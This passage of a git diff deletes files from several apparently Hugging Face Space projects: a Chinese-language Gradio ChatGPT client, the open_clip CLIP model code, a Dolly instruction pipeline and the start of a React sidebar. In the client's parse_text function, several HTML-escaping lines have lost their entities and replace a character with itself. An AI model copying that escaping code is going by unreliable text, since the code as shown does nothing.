line.split('`') - if count % 2 == 1: - lines[i] = f'
    '
    -                firstline = True
    -            else:
    -                lines[i] = f'
    ' - else: - if i > 0: - if count % 2 == 1: - line = line.replace("&", "&") - line = line.replace("\"", "`\"`") - line = line.replace("\'", "`\'`") - line = line.replace("<", "<") - line = line.replace(">", ">") - line = line.replace(" ", " ") - line = line.replace("*", "*") - line = line.replace("_", "_") - line = line.replace("#", "#") - line = line.replace("-", "-") - line = line.replace(".", ".") - line = line.replace("!", "!") - line = line.replace("(", "(") - line = line.replace(")", ")") - lines[i] = "
    "+line - text = "".join(lines) - return text - -def predict(inputs, top_p, temperature, openai_api_key, chatbot=[], history=[], system_prompt=initial_prompt, retry=False, summary=False): # repetition_penalty, top_k - - print(f"chatbot 1: {chatbot}") - - headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {openai_api_key}" - } - - chat_counter = len(history) // 2 - - print(f"chat_counter - {chat_counter}") - - messages = [compose_system(system_prompt)] - if chat_counter: - for data in chatbot: - temp1 = {} - temp1["role"] = "user" - temp1["content"] = data[0] - temp2 = {} - temp2["role"] = "assistant" - temp2["content"] = data[1] - if temp1["content"] != "": - messages.append(temp1) - messages.append(temp2) - else: - messages[-1]['content'] = temp2['content'] - if retry and chat_counter: - messages.pop() - elif summary: - messages.append(compose_user( - "请帮我总结一下上述对话的内容,实现减少字数的同时,保证对话的质量。在总结中不要加入这一句话。")) - history = ["我们刚刚聊了什么?"] - else: - temp3 = {} - temp3["role"] = "user" - temp3["content"] = inputs - messages.append(temp3) - chat_counter += 1 - # messages - payload = { - "model": "gpt-3.5-turbo", - "messages": messages, # [{"role": "user", "content": f"{inputs}"}], - "temperature": temperature, # 1.0, - "top_p": top_p, # 1.0, - "n": 1, - "stream": True, - "presence_penalty": 0, - "frequency_penalty": 0, - } - - if not summary: - history.append(inputs) - print(f"payload is - {payload}") - # make a POST request to the API endpoint using the requests.post method, passing in stream=True - response = requests.post(API_URL, headers=headers, - json=payload, stream=True) - #response = requests.post(API_URL, headers=headers, json=payload, stream=True) - - token_counter = 0 - partial_words = "" - - counter = 0 - chatbot.append((history[-1], "")) - for chunk in response.iter_lines(): - if counter == 0: - counter += 1 - continue - counter += 1 - # check whether each line is non-empty - if chunk: - # decode each line as response data is in bytes - try: - if len(json.loads(chunk.decode()[6:])['choices'][0]["delta"]) == 0: - break - except Exception as e: - chatbot.pop() - chatbot.append((history[-1], f"☹️发生了错误
    返回值:{response.text}
    异常:{e}")) - history.pop() - yield chatbot, history - break - #print(json.loads(chunk.decode()[6:])['choices'][0]["delta"] ["content"]) - partial_words = partial_words + \ - json.loads(chunk.decode()[6:])[ - 'choices'][0]["delta"]["content"] - if token_counter == 0: - history.append(" " + partial_words) - else: - history[-1] = parse_text(partial_words) - chatbot[-1] = (history[-2], history[-1]) - # chat = [(history[i], history[i + 1]) for i in range(0, len(history) - 1, 2) ] # convert to tuples of list - token_counter += 1 - # resembles {chatbot: chat, state: history} - yield chatbot, history - - - -def delete_last_conversation(chatbot, history): - chatbot.pop() - history.pop() - history.pop() - return chatbot, history - -def save_chat_history(filename, system, history, chatbot): - if filename == "": - return - if not filename.endswith(".json"): - filename += ".json" - os.makedirs(HISTORY_DIR, exist_ok=True) - json_s = {"system": system, "history": history, "chatbot": chatbot} - with open(os.path.join(HISTORY_DIR, filename), "w") as f: - json.dump(json_s, f) - - -def load_chat_history(filename): - with open(os.path.join(HISTORY_DIR, filename), "r") as f: - json_s = json.load(f) - return filename, json_s["system"], json_s["history"], json_s["chatbot"] - - -def get_file_names(dir, plain=False, filetype=".json"): - # find all json files in the current directory and return their names - try: - files = [f for f in os.listdir(dir) if f.endswith(filetype)] - except FileNotFoundError: - files = [] - if plain: - return files - else: - return gr.Dropdown.update(choices=files) - -def get_history_names(plain=False): - return get_file_names(HISTORY_DIR, plain) - -def load_template(filename): - lines = [] - with open(os.path.join(TEMPLATES_DIR, filename), "r", encoding="utf8") as csvfile: - reader = csv.reader(csvfile) - lines = list(reader) - lines = lines[1:] - return {row[0]:row[1] for row in lines}, gr.Dropdown.update(choices=[row[0] for row in lines]) - -def get_template_names(plain=False): - return get_file_names(TEMPLATES_DIR, plain, filetype=".csv") - -def reset_state(): - return [], [] - - -def compose_system(system_prompt): - return {"role": "system", "content": system_prompt} - - -def compose_user(user_input): - return {"role": "user", "content": user_input} - - -def reset_textbox(): - return gr.update(value='') - -title = """

    ChatGPT

    """ -description = """
    - - -此App使用 `gpt-3.5-turbo` 大语言模型 -
    -""" -with gr.Blocks() as demo: - gr.HTML(title) - keyTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入你的OpenAI API-key", - value=my_api_key, label="API Key(默认使用LanQian的key)", type="password", visible=not HIDE_MY_KEY).style(container=True) - chatbot = gr.Chatbot() # .style(color_map=("#1D51EE", "#585A5B")) - history = gr.State([]) - promptTemplates = gr.State({}) - TRUECOMSTANT = gr.State(True) - FALSECONSTANT = gr.State(False) - topic = gr.State("未命名对话历史记录") - - with gr.Row(): - with gr.Column(scale=12): - txt = gr.Textbox(show_label=False, placeholder="在这里输入").style( - container=False) - with gr.Column(min_width=50, scale=1): - submitBtn = gr.Button("🚀", variant="primary") - with gr.Row(): - emptyBtn = gr.Button("🧹 新的对话") - retryBtn = gr.Button("🔄 重新生成") - delLastBtn = gr.Button("🗑️ 删除上条对话") - reduceTokenBtn = gr.Button("♻️ 总结对话") - systemPromptTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入System Prompt...", - label="System prompt", value=initial_prompt).style(container=True) - with gr.Accordion(label="加载Prompt模板", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - templateFileSelectDropdown = gr.Dropdown(label="选择Prompt模板集合文件(.csv)", choices=get_template_names(plain=True), multiselect=False) - with gr.Column(scale=1): - templateRefreshBtn = gr.Button("🔄 刷新") - templaeFileReadBtn = gr.Button("📂 读入模板") - with gr.Row(): - with gr.Column(scale=6): - templateSelectDropdown = gr.Dropdown(label="从Prompt模板中加载", choices=[], multiselect=False) - with gr.Column(scale=1): - templateApplyBtn = gr.Button("⬇️ 应用") - with gr.Accordion(label="保存/加载对话历史记录(在文本框中输入文件名,点击“保存对话”按钮,历史记录文件会被存储到Python文件旁边)", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - saveFileName = gr.Textbox( - show_label=True, placeholder=f"在这里输入保存的文件名...", label="设置保存文件名", value="对话历史记录").style(container=True) - with gr.Column(scale=1): - saveBtn = gr.Button("💾 保存对话") - with gr.Row(): - with gr.Column(scale=6): - historyFileSelectDropdown = gr.Dropdown(label="从列表中加载对话", choices=get_history_names(plain=True), multiselect=False) - with gr.Column(scale=1): - historyRefreshBtn = gr.Button("🔄 刷新") - historyReadBtn = gr.Button("📂 读入对话") - #inputs, top_p, temperature, top_k, repetition_penalty - with gr.Accordion("参数", open=False): - top_p = gr.Slider(minimum=-0, maximum=1.0, value=1.0, step=0.05, - interactive=True, label="Top-p (nucleus sampling)",) - temperature = gr.Slider(minimum=-0, maximum=5.0, value=0.6, - step=0.1, interactive=True, label="Temperature",) - #top_k = gr.Slider( minimum=1, maximum=50, value=4, step=1, interactive=True, label="Top-k",) - #repetition_penalty = gr.Slider( minimum=0.1, maximum=3.0, value=1.03, step=0.01, interactive=True, label="Repetition Penalty", ) - gr.Markdown(description) - - - txt.submit(predict, [txt, top_p, temperature, keyTxt, - chatbot, history, systemPromptTxt], [chatbot, history]) - txt.submit(reset_textbox, [], [txt]) - submitBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, - history, systemPromptTxt], [chatbot, history], show_progress=True) - submitBtn.click(reset_textbox, [], [txt]) - emptyBtn.click(reset_state, outputs=[chatbot, history]) - retryBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, history, - systemPromptTxt, TRUECOMSTANT], [chatbot, history], show_progress=True) - delLastBtn.click(delete_last_conversation, [chatbot, history], [ - chatbot, history], show_progress=True) - reduceTokenBtn.click(predict, [txt, top_p, temperature, keyTxt, chatbot, history, - systemPromptTxt, FALSECONSTANT, TRUECOMSTANT], [chatbot, history], show_progress=True) - saveBtn.click(save_chat_history, [ - saveFileName, systemPromptTxt, history, chatbot], None, show_progress=True) - saveBtn.click(get_history_names, None, [historyFileSelectDropdown]) - historyRefreshBtn.click(get_history_names, None, [historyFileSelectDropdown]) - historyReadBtn.click(load_chat_history, [historyFileSelectDropdown], [saveFileName, systemPromptTxt, history, chatbot], show_progress=True) - templateRefreshBtn.click(get_template_names, None, [templateFileSelectDropdown]) - templaeFileReadBtn.click(load_template, [templateFileSelectDropdown], [promptTemplates, templateSelectDropdown], show_progress=True) - templateApplyBtn.click(lambda x, y: x[y], [promptTemplates, templateSelectDropdown], [systemPromptTxt], show_progress=True) - -print("温馨提示:访问 http://localhost:7860 查看界面") -# 默认开启本地服务器,默认可以直接从IP访问,默认不创建公开分享链接 -demo.title = "ChatGPT" - -#if running in Docker -if dockerflag: - if authflag: - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(username, password)) - else: - demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) -#if not running in Docker -else: - #demo.queue().launch(share=True) # 改为 share=True 可以创建公开分享链接 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) # 可自定义端口 - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(os.environ["userpass"], os.environ["userpass"])) # 可设置用户名与密码 diff --git a/spaces/LanguageBind/LanguageBind/open_clip/model.py b/spaces/LanguageBind/LanguageBind/open_clip/model.py deleted file mode 100644 index f85b68ba23117cb65d082cf5cd4cf7528bab4619..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/open_clip/model.py +++ /dev/null @@ -1,473 +0,0 @@ -""" CLIP Model - -Adapted from https://github.com/openai/CLIP. Originally MIT License, Copyright (c) 2021 OpenAI. -""" -from dataclasses import dataclass -import logging -import math -from typing import Optional, Tuple, Union - -import numpy as np -import torch -import torch.nn.functional as F -from torch import nn -from torch.utils.checkpoint import checkpoint - -from .hf_model import HFTextEncoder -from .modified_resnet import ModifiedResNet -from .timm_model import TimmModel -from .transformer import LayerNormFp32, LayerNorm, QuickGELU, Attention, VisionTransformer, TextTransformer -from .utils import to_2tuple - - -@dataclass -class CLIPVisionCfg: - layers: Union[Tuple[int, int, int, int], int] = 12 - width: int = 768 - head_width: int = 64 - mlp_ratio: float = 4.0 - patch_size: int = 16 - image_size: Union[Tuple[int, int], int] = 224 - - ls_init_value: Optional[float] = None # layer scale initial value - patch_dropout: float = 0. # what fraction of patches to dropout during training (0 would mean disabled and no patches dropped) - 0.5 to 0.75 recommended in the paper for optimal results - input_patchnorm: bool = False # whether to use dual patchnorm - would only apply the input layernorm on each patch, as post-layernorm already exist in original clip vit design - global_average_pool: bool = False # whether to global average pool the last embedding layer, instead of using CLS token (https://arxiv.org/abs/2205.01580) - attentional_pool: bool = False # whether to use attentional pooler in the last embedding layer - n_queries: int = 256 # n_queries for attentional pooler - attn_pooler_heads: int = 8 # n heads for attentional_pooling - output_tokens: bool = False - - timm_model_name: str = None # a valid model name overrides layers, width, patch_size - timm_model_pretrained: bool = False # use (imagenet) pretrained weights for named model - timm_pool: str = 'avg' # feature pooling for timm model ('abs_attn', 'rot_attn', 'avg', '') - timm_proj: str = 'linear' # linear projection for timm model output ('linear', 'mlp', '') - timm_proj_bias: bool = False # enable bias final projection - timm_drop: float = 0. # head dropout - timm_drop_path: Optional[float] = None # backbone stochastic depth - - -@dataclass -class CLIPTextCfg: - context_length: int = 77 - vocab_size: int = 49408 - width: int = 512 - heads: int = 8 - layers: int = 12 - ls_init_value: Optional[float] = None # layer scale initial value - hf_model_name: str = None - hf_tokenizer_name: str = None - hf_model_pretrained: bool = True - proj: str = 'mlp' - pooler_type: str = 'mean_pooler' - embed_cls: bool = False - pad_id: int = 0 - output_tokens: bool = False - - -def get_cast_dtype(precision: str): - cast_dtype = None - if precision == 'bf16': - cast_dtype = torch.bfloat16 - elif precision == 'fp16': - cast_dtype = torch.float16 - return cast_dtype - - -def get_input_dtype(precision: str): - input_dtype = None - if precision in ('bf16', 'pure_bf16'): - input_dtype = torch.bfloat16 - elif precision in ('fp16', 'pure_fp16'): - input_dtype = torch.float16 - return input_dtype - - -def _build_vision_tower( - embed_dim: int, - vision_cfg: CLIPVisionCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None -): - if isinstance(vision_cfg, dict): - vision_cfg = CLIPVisionCfg(**vision_cfg) - - # OpenAI models are pretrained w/ QuickGELU but native nn.GELU is both faster and more - # memory efficient in recent PyTorch releases (>= 1.10). - # NOTE: timm models always use native GELU regardless of quick_gelu flag. - act_layer = QuickGELU if quick_gelu else nn.GELU - - if vision_cfg.timm_model_name: - visual = TimmModel( - vision_cfg.timm_model_name, - pretrained=vision_cfg.timm_model_pretrained, - pool=vision_cfg.timm_pool, - proj=vision_cfg.timm_proj, - proj_bias=vision_cfg.timm_proj_bias, - drop=vision_cfg.timm_drop, - drop_path=vision_cfg.timm_drop_path, - patch_drop=vision_cfg.patch_dropout if vision_cfg.patch_dropout > 0 else None, - embed_dim=embed_dim, - image_size=vision_cfg.image_size, - ) - elif isinstance(vision_cfg.layers, (tuple, list)): - vision_heads = vision_cfg.width * 32 // vision_cfg.head_width - visual = ModifiedResNet( - layers=vision_cfg.layers, - output_dim=embed_dim, - heads=vision_heads, - image_size=vision_cfg.image_size, - width=vision_cfg.width, - ) - else: - vision_heads = vision_cfg.width // vision_cfg.head_width - norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm - visual = VisionTransformer( - image_size=vision_cfg.image_size, - patch_size=vision_cfg.patch_size, - width=vision_cfg.width, - layers=vision_cfg.layers, - heads=vision_heads, - mlp_ratio=vision_cfg.mlp_ratio, - ls_init_value=vision_cfg.ls_init_value, - patch_dropout=vision_cfg.patch_dropout, - input_patchnorm=vision_cfg.input_patchnorm, - global_average_pool=vision_cfg.global_average_pool, - attentional_pool=vision_cfg.attentional_pool, - n_queries=vision_cfg.n_queries, - attn_pooler_heads=vision_cfg.attn_pooler_heads, - output_tokens=vision_cfg.output_tokens, - output_dim=embed_dim, - act_layer=act_layer, - norm_layer=norm_layer, - ) - - return visual - - -def _build_text_tower( - embed_dim: int, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, -): - if isinstance(text_cfg, dict): - text_cfg = CLIPTextCfg(**text_cfg) - - if text_cfg.hf_model_name: - text = HFTextEncoder( - text_cfg.hf_model_name, - output_dim=embed_dim, - proj=text_cfg.proj, - pooler_type=text_cfg.pooler_type, - pretrained=text_cfg.hf_model_pretrained, - output_tokens=text_cfg.output_tokens, - ) - else: - act_layer = QuickGELU if quick_gelu else nn.GELU - norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm - - text = TextTransformer( - context_length=text_cfg.context_length, - vocab_size=text_cfg.vocab_size, - width=text_cfg.width, - heads=text_cfg.heads, - layers=text_cfg.layers, - ls_init_value=text_cfg.ls_init_value, - output_dim=embed_dim, - embed_cls=text_cfg.embed_cls, - output_tokens=text_cfg.output_tokens, - pad_id=text_cfg.pad_id, - act_layer=act_layer, - norm_layer=norm_layer, - ) - return text - - -class CLIP(nn.Module): - output_dict: torch.jit.Final[bool] - - def __init__( - self, - embed_dim: int, - vision_cfg: CLIPVisionCfg, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, - output_dict: bool = False, - ): - super().__init__() - self.output_dict = output_dict - self.visual = _build_vision_tower(embed_dim, vision_cfg, quick_gelu, cast_dtype) - - text = _build_text_tower(embed_dim, text_cfg, quick_gelu, cast_dtype) - self.transformer = text.transformer - self.context_length = text.context_length - self.vocab_size = text.vocab_size - self.token_embedding = text.token_embedding - self.positional_embedding = text.positional_embedding - self.ln_final = text.ln_final - self.text_projection = text.text_projection - self.register_buffer('attn_mask', text.attn_mask, persistent=False) - - self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07)) - - def lock_image_tower(self, unlocked_groups=0, freeze_bn_stats=False): - # lock image tower as per LiT - https://arxiv.org/abs/2111.07991 - self.visual.lock(unlocked_groups=unlocked_groups, freeze_bn_stats=freeze_bn_stats) - - @torch.jit.ignore - def set_grad_checkpointing(self, enable=True): - self.visual.set_grad_checkpointing(enable) - self.transformer.grad_checkpointing = enable - - def encode_image(self, image, normalize: bool = False): - features = self.visual(image) - return F.normalize(features, dim=-1) if normalize else features - - def encode_text(self, text, normalize: bool = False): - cast_dtype = self.transformer.get_cast_dtype() - - x = self.token_embedding(text).to(cast_dtype) # [batch_size, n_ctx, d_model] - - x = x + self.positional_embedding.to(cast_dtype) - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x, attn_mask=self.attn_mask) - x = x.permute(1, 0, 2) # LND -> NLD - x = self.ln_final(x) # [batch_size, n_ctx, transformer.width] - # take features from the eot embedding (eot_token is the highest number in each sequence) - x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection - return F.normalize(x, dim=-1) if normalize else x - - def forward( - self, - image: Optional[torch.Tensor] = None, - text: Optional[torch.Tensor] = None, - ): - image_features = self.encode_image(image, normalize=True) if image is not None else None - text_features = self.encode_text(text, normalize=True) if text is not None else None - if self.output_dict: - return { - "image_features": image_features, - "text_features": text_features, - "logit_scale": self.logit_scale.exp() - } - return image_features, text_features, self.logit_scale.exp() - - -class CustomTextCLIP(nn.Module): - output_dict: torch.jit.Final[bool] - - def __init__( - self, - embed_dim: int, - vision_cfg: CLIPVisionCfg, - text_cfg: CLIPTextCfg, - quick_gelu: bool = False, - cast_dtype: Optional[torch.dtype] = None, - output_dict: bool = False, - ): - super().__init__() - self.output_dict = output_dict - self.visual = _build_vision_tower(embed_dim, vision_cfg, quick_gelu, cast_dtype) - self.text = _build_text_tower(embed_dim, text_cfg, quick_gelu, cast_dtype) - self.context_length = self.text.context_length - self.vocab_size = self.text.vocab_size - self.logit_scale = nn.Parameter(torch.ones([]) * np.log(1 / 0.07)) - - def lock_image_tower(self, unlocked_groups=0, freeze_bn_stats=False): - # lock image tower as per LiT - https://arxiv.org/abs/2111.07991 - self.visual.lock(unlocked_groups=unlocked_groups, freeze_bn_stats=freeze_bn_stats) - - def lock_text_tower(self, unlocked_layers: int = 0, freeze_layer_norm: bool = True): - self.text.lock(unlocked_layers, freeze_layer_norm) - - @torch.jit.ignore - def set_grad_checkpointing(self, enable=True): - self.visual.set_grad_checkpointing(enable) - self.text.set_grad_checkpointing(enable) - - def encode_image(self, image, normalize: bool = False): - features = self.visual(image) - return F.normalize(features, dim=-1) if normalize else features - - def encode_text(self, text, normalize: bool = False): - features = self.text(text) - return F.normalize(features, dim=-1) if normalize else features - - def forward( - self, - image: Optional[torch.Tensor] = None, - text: Optional[torch.Tensor] = None, - ): - image_features = self.encode_image(image, normalize=True) if image is not None else None - text_features = self.encode_text(text, normalize=True) if text is not None else None - if self.output_dict: - return { - "image_features": image_features, - "text_features": text_features, - "logit_scale": self.logit_scale.exp() - } - return image_features, text_features, self.logit_scale.exp() - - -def convert_weights_to_lp(model: nn.Module, dtype=torch.float16): - """Convert applicable model parameters to low-precision (bf16 or fp16)""" - - def _convert_weights(l): - if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)): - l.weight.data = l.weight.data.to(dtype) - if l.bias is not None: - l.bias.data = l.bias.data.to(dtype) - - if isinstance(l, (nn.MultiheadAttention, Attention)): - for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]: - tensor = getattr(l, attr) - if tensor is not None: - tensor.data = tensor.data.to(dtype) - - if isinstance(l, (CLIP, TextTransformer)): - # convert text nn.Parameter projections - attr = getattr(l, "text_projection", None) - if attr is not None: - attr.data = attr.data.to(dtype) - - if isinstance(l, VisionTransformer): - # convert vision nn.Parameter projections - attr = getattr(l, "proj", None) - if attr is not None: - attr.data = attr.data.to(dtype) - - model.apply(_convert_weights) - - -convert_weights_to_fp16 = convert_weights_to_lp # backwards compat - - -# used to maintain checkpoint compatibility -def convert_to_custom_text_state_dict(state_dict: dict): - if 'text_projection' in state_dict: - # old format state_dict, move text tower -> .text - new_state_dict = {} - for k, v in state_dict.items(): - if any(k.startswith(p) for p in ( - 'text_projection', - 'positional_embedding', - 'token_embedding', - 'transformer', - 'ln_final', - )): - k = 'text.' + k - new_state_dict[k] = v - return new_state_dict - return state_dict - - -def build_model_from_openai_state_dict( - state_dict: dict, - quick_gelu=True, - cast_dtype=torch.float16, -): - vit = "visual.proj" in state_dict - - if vit: - vision_width = state_dict["visual.conv1.weight"].shape[0] - vision_layers = len( - [k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")]) - vision_patch_size = state_dict["visual.conv1.weight"].shape[-1] - grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5) - image_size = vision_patch_size * grid_size - else: - counts: list = [ - len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]] - vision_layers = tuple(counts) - vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0] - output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5) - vision_patch_size = None - assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0] - image_size = output_width * 32 - - embed_dim = state_dict["text_projection"].shape[1] - context_length = state_dict["positional_embedding"].shape[0] - vocab_size = state_dict["token_embedding.weight"].shape[0] - transformer_width = state_dict["ln_final.weight"].shape[0] - transformer_heads = transformer_width // 64 - transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks"))) - - vision_cfg = CLIPVisionCfg( - layers=vision_layers, - width=vision_width, - patch_size=vision_patch_size, - image_size=image_size, - ) - text_cfg = CLIPTextCfg( - context_length=context_length, - vocab_size=vocab_size, - width=transformer_width, - heads=transformer_heads, - layers=transformer_layers, - ) - model = CLIP( - embed_dim, - vision_cfg=vision_cfg, - text_cfg=text_cfg, - quick_gelu=quick_gelu, # OpenAI models were trained with QuickGELU - cast_dtype=cast_dtype, - ) - - for key in ["input_resolution", "context_length", "vocab_size"]: - state_dict.pop(key, None) - - convert_weights_to_fp16(model) # OpenAI state dicts are partially converted to float16 - model.load_state_dict(state_dict) - return model.eval() - - -def trace_model(model, batch_size=256, device=torch.device('cpu')): - model.eval() - image_size = model.visual.image_size - example_images = torch.ones((batch_size, 3, image_size, image_size), device=device) - example_text = torch.zeros((batch_size, model.context_length), dtype=torch.int, device=device) - model = torch.jit.trace_module( - model, - inputs=dict( - forward=(example_images, example_text), - encode_text=(example_text,), - encode_image=(example_images,) - )) - model.visual.image_size = image_size - return model - - -def resize_pos_embed(state_dict, model, interpolation: str = 'bicubic', antialias: bool = True): - # Rescale the grid of position embeddings when loading from state_dict - old_pos_embed = state_dict.get('visual.positional_embedding', None) - if old_pos_embed is None or not hasattr(model.visual, 'grid_size'): - return - grid_size = to_2tuple(model.visual.grid_size) - extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) - new_seq_len = grid_size[0] * grid_size[1] + extra_tokens - if new_seq_len == old_pos_embed.shape[0]: - return - - if extra_tokens: - pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], old_pos_embed[extra_tokens:] - else: - pos_emb_tok, pos_emb_img = None, old_pos_embed - old_grid_size = to_2tuple(int(math.sqrt(len(pos_emb_img)))) - - logging.info('Resizing position embedding grid-size from %s to %s', old_grid_size, grid_size) - pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) - pos_emb_img = F.interpolate( - pos_emb_img, - size=grid_size, - mode=interpolation, - antialias=antialias, - align_corners=False, - ) - pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] - if pos_emb_tok is not None: - new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) - else: - new_pos_embed = pos_emb_img - state_dict['visual.positional_embedding'] = new_pos_embed diff --git a/spaces/Lenery/Dolly-v2/instruct_pipeline.py b/spaces/Lenery/Dolly-v2/instruct_pipeline.py deleted file mode 100644 index a62ed29bb0e2d666fa294438d1874707f381bbe6..0000000000000000000000000000000000000000 --- a/spaces/Lenery/Dolly-v2/instruct_pipeline.py +++ /dev/null @@ -1,158 +0,0 @@ -import logging -import re - -import numpy as np -from transformers import Pipeline, PreTrainedTokenizer - -logger = logging.getLogger(__name__) - -INSTRUCTION_KEY = "### Instruction:" -RESPONSE_KEY = "### Response:" -END_KEY = "### End" -INTRO_BLURB = ( - "Below is an instruction that describes a task. Write a response that appropriately completes the request." -) - -# This is the prompt that is used for generating responses using an already trained model. It ends with the response -# key, where the job of the model is to provide the completion that follows it (i.e. the response itself). -PROMPT_FOR_GENERATION_FORMAT = """{intro} -{instruction_key} -{instruction} -{response_key} -""".format( - intro=INTRO_BLURB, - instruction_key=INSTRUCTION_KEY, - instruction="{instruction}", - response_key=RESPONSE_KEY, -) - - -def get_special_token_id(tokenizer: PreTrainedTokenizer, key: str) -> int: - """Gets the token ID for a given string that has been added to the tokenizer as a special token. - When training, we configure the tokenizer so that the sequences like "### Instruction:" and "### End" are - treated specially and converted to a single, new token. This retrieves the token ID each of these keys map to. - Args: - tokenizer (PreTrainedTokenizer): the tokenizer - key (str): the key to convert to a single token - Raises: - RuntimeError: if more than one ID was generated - Returns: - int: the token ID for the given key - """ - token_ids = tokenizer.encode(key) - if len(token_ids) > 1: - raise ValueError(f"Expected only a single token for '{key}' but found {token_ids}") - return token_ids[0] - - -class InstructionTextGenerationPipeline(Pipeline): - def __init__( - self, *args, do_sample: bool = True, max_new_tokens: int = 256, top_p: float = 0.92, top_k: int = 0, **kwargs - ): - super().__init__(*args, do_sample=do_sample, max_new_tokens=max_new_tokens, top_p=top_p, top_k=top_k, **kwargs) - - def _sanitize_parameters(self, return_instruction_text=False, **generate_kwargs): - preprocess_params = {} - - # newer versions of the tokenizer configure the response key as a special token. newer versions still may - # append a newline to yield a single token. find whatever token is configured for the response key. - tokenizer_response_key = next( - (token for token in self.tokenizer.additional_special_tokens if token.startswith(RESPONSE_KEY)), None - ) - - response_key_token_id = None - end_key_token_id = None - if tokenizer_response_key: - try: - response_key_token_id = get_special_token_id(self.tokenizer, tokenizer_response_key) - end_key_token_id = get_special_token_id(self.tokenizer, END_KEY) - - # Ensure generation stops once it generates "### End" - generate_kwargs["eos_token_id"] = end_key_token_id - except ValueError: - pass - - forward_params = generate_kwargs - postprocess_params = { - "response_key_token_id": response_key_token_id, - "end_key_token_id": end_key_token_id, - "return_instruction_text": return_instruction_text, - } - - return preprocess_params, forward_params, postprocess_params - - def preprocess(self, instruction_text, **generate_kwargs): - prompt_text = PROMPT_FOR_GENERATION_FORMAT.format(instruction=instruction_text) - inputs = self.tokenizer( - prompt_text, - return_tensors="pt", - ) - inputs["prompt_text"] = prompt_text - inputs["instruction_text"] = instruction_text - return inputs - - def _forward(self, model_inputs, **generate_kwargs): - input_ids = model_inputs["input_ids"] - attention_mask = model_inputs.get("attention_mask", None) - generated_sequence = self.model.generate( - input_ids=input_ids.to(self.model.device), - attention_mask=attention_mask, - pad_token_id=self.tokenizer.pad_token_id, - **generate_kwargs, - )[0].cpu() - instruction_text = model_inputs.pop("instruction_text") - return {"generated_sequence": generated_sequence, "input_ids": input_ids, "instruction_text": instruction_text} - - def postprocess(self, model_outputs, response_key_token_id, end_key_token_id, return_instruction_text): - sequence = model_outputs["generated_sequence"] - instruction_text = model_outputs["instruction_text"] - - # The response will be set to this variable if we can identify it. - decoded = None - - # If we have token IDs for the response and end, then we can find the tokens and only decode between them. - if response_key_token_id and end_key_token_id: - # Find where "### Response:" is first found in the generated tokens. Considering this is part of the - # prompt, we should definitely find it. We will return the tokens found after this token. - response_pos = None - response_positions = np.where(sequence == response_key_token_id)[0] - if len(response_positions) == 0: - logger.warn(f"Could not find response key {response_key_token_id} in: {sequence}") - else: - response_pos = response_positions[0] - - if response_pos: - # Next find where "### End" is located. The model has been trained to end its responses with this - # sequence (or actually, the token ID it maps to, since it is a special token). We may not find - # this token, as the response could be truncated. If we don't find it then just return everything - # to the end. Note that even though we set eos_token_id, we still see the this token at the end. - end_pos = None - end_positions = np.where(sequence == end_key_token_id)[0] - if len(end_positions) > 0: - end_pos = end_positions[0] - - decoded = self.tokenizer.decode(sequence[response_pos + 1 : end_pos]).strip() - else: - # Otherwise we'll decode everything and use a regex to find the response and end. - - fully_decoded = self.tokenizer.decode(sequence) - - # The response appears after "### Response:". The model has been trained to append "### End" at the - # end. - m = re.search(r"#+\s*Response:\s*(.+?)#+\s*End", fully_decoded, flags=re.DOTALL) - - if m: - decoded = m.group(1).strip() - else: - # The model might not generate the "### End" sequence before reaching the max tokens. In this case, - # return everything after "### Response:". - m = re.search(r"#+\s*Response:\s*(.+)", fully_decoded, flags=re.DOTALL) - if m: - decoded = m.group(1).strip() - else: - logger.warn(f"Failed to find response in:\n{fully_decoded}") - - if return_instruction_text: - return {"instruction_text": instruction_text, "generated_text": decoded} - - return decoded diff --git a/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx b/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx deleted file mode 100644 index c54d93097adeea5deeba005ff6c8b2bc3e6871e0..0000000000000000000000000000000000000000 --- a/spaces/LuxOAI/ChatGpt-Web/app/components/sidebar.tsx +++ /dev/null @@ -1,205 +0,0 @@ -import { useEffect, useRef } from "react"; - -import styles from "./home.module.scss"; - -import { IconButton } from "./button"; -import 